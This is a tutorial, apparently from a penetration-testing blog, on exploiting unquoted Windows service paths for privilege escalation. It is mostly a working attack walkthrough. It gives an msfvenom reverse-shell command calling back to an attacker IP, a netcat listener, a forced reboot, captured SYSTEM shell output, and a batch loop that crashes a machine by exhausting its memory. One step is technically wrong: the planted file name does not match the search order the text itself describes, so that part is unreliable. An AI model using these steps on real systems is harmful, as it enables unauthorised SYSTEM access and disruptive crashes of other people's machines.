Unquoted Service Paths
An unquoted service path is when the path binary is not enclosed in quotes. I will go into detail why this can be a problem.
Prequisites
- Service must be running with higher privileges (LocalSystem, or Administrator)
- Service must be unquoted
- Must have write access to a location in the path
Background
Before we can understand the issue, we need some background on how Windows runs programs. Let’s take this program for example:
"C:\Program Files\Program Folder\sub folder\EatCake.exe"When Windows starts a service, it has to search for the service. Generally this is an easy task because the path is specifically defined within quotes. Since the path to the program EatCake.exe is in quotes, Windows has no questions about where to find the executable. This is the correct way to implement a service.
Now what if the quotes are left off of the program?
C:\Program Files\Program Folder\sub folder\EatCake.exeLet’s say we want to execute the service EatCake.exe. Windows will first read the path from left to right and check again each time there are spaces. So in our example, Windows will check for the program in this order:
C:\Program.exe
C:\Program Files\Program.exe
C:\Program Files\Program Folder\sub.exe
C:\Program Files\Program Folder\sub folder\EatCake.exeNote: The .exe is added to the name before each space if it’s not already there to see if it’s the correct program.
Now if no changes were made to the path, Windows would eventually find the program EatCake.exe after the 4th try and it would execute the program. So how DO we exploit this vulnerable service?
Exploitation
If we can create a malicious program called EatCake.exe and place it somewhere in the path before the real EatCake.exe program, hopefully Windows will execute our malicious version of the program before the real one.
First step is to check if we have write access to each of these locations:
C:\
C:\Program Files\
C:\Program Files\Program Folder\
C:\Program Files\Program Folder\sub folder\We can do this by using the built in program called icacls on Windows.
HTML
icacls "C:\"icacls "C:\Program Files\"icacls "C:\Program Files\Program Folder\"icacls "C:\Program Files\Program Folder\sub folder\"
By running each of these we should get some output. Let’s see if we have write access to the second level folder by running icacls “C:\Program Files\Program Files\”
icacls "C:\Program Files\Program Folder"C:\Program Files\Program Folder Everyone:(OI)(CI)(F)NT SERVICE\TrustedInstaller:(I)(F)NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)NT AUTHORITY\SYSTEM:(I)(F)NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)BUILTIN\Administrators:(I)(F)BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)BUILTIN\Users:(I)(RX)BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)CREATOR OWNER:(I)(OI)(CI)(IO)(F)APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)Successfully processed 1 files; Failed processing 0 files
This is a lot of output so I’ll point you to the important parts. Starting at line 2 of the output you will start to see a list of groups and some letters after them. The one we are interested in is Everyone:(OI)(CI)(F)
- Everyone — This is the group being identified
- OI — Object Inherit (This means files below inherit this permission)
- CI — Container Inherit (This means containers below inherit this permission)
- F — Full Control
Anytime you see Everyone for service permissions, it means the permissions after apply to everyone on that system. In our case, Everyone has Full (f), read/write access to the “C:\Program Files\Program Folder”
So let’s take a step back. We know that Windows reads unquoted paths from left to right and checks at each space, and we have write access to the “C:\Program Files\Program Folder\”. Theoretically we can create a malicious program called EatCake.exe and place it in the following location:
C:\Program Files\Program Folder\EatCake.exeNow when the service EatCake.exe is executed, our malicious version should be executed before Windows finds the real version.
Now I will explain how to create our malicious program to get an elevated shell.
Reverse Shell
A popular method is to create a reverse shell back to our attacking machine. We can do this by using a tool called msfvenom which comes built-in with Kali. If we run the following command on our Kali machine, we will create a reverse shell called EatCake.exe
root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.99 LPORT=443 -f exe -o EatCake.exeNow that we have our newly created program EatCake.exe, we need to drop it in the location mentioned previously which is “C:\Program Files\Program Folder\EatCake.exe”
After we have copied over the file to the target machine and placed in our specified file location, we should start a listener on our attacking Kali machine so we can “catch” the reverse shell when the malicious service is executed. We do this by running the command:
root@kali:~# nc -nlvp 443Now that our listener is running, we need to restart the service. We can do this by doing one of the following:
- Wait for someone to restart the computer
- Wait for someone to restart the service
- Shutdown the computer and wait for someone to turn it on.
- If we have restart privileges (most likely not) then we can manually restart the service
We are going to assume we don’t have privileges to restart the service or the machine so we will manually shutdown the machine ourselves running this command on the Windows machine:
shutdown /r /t 0When the computer starts up again (someone else boots up the system), the service will automatically be started, but our malicious EatCake.exe program will be executed instead which will run the reverse shell and connect back to our computer with SYSTEM privileges.
root@kali:~# nc -nvlp 443listing on [any] 443 ...192.168.1.77: inverse host lookup failed: Unknown host connect to [192.168.1.99] 56733Microsoft Windows [Version 10.0.14393](c) 2016 Microsoft Corporation. All rights reserved.C:\Users\pizza\Desktop> whoamiNT AUTHORITY\SYSTEM
Keep in mind that in a real world scenario shutting down a production server is a bad idea and will raise a lot of flags. Use it as a last resort.
There are some other methods to restart a computer that I’ve used as well. You can spawn an infinite loop that crashes the computer by eating up resources. Save the file as a .bat file and execute it. After about 10 minutes the computer should eat up all the RAM and restart the computer.
@echo:crashstartgoto crash
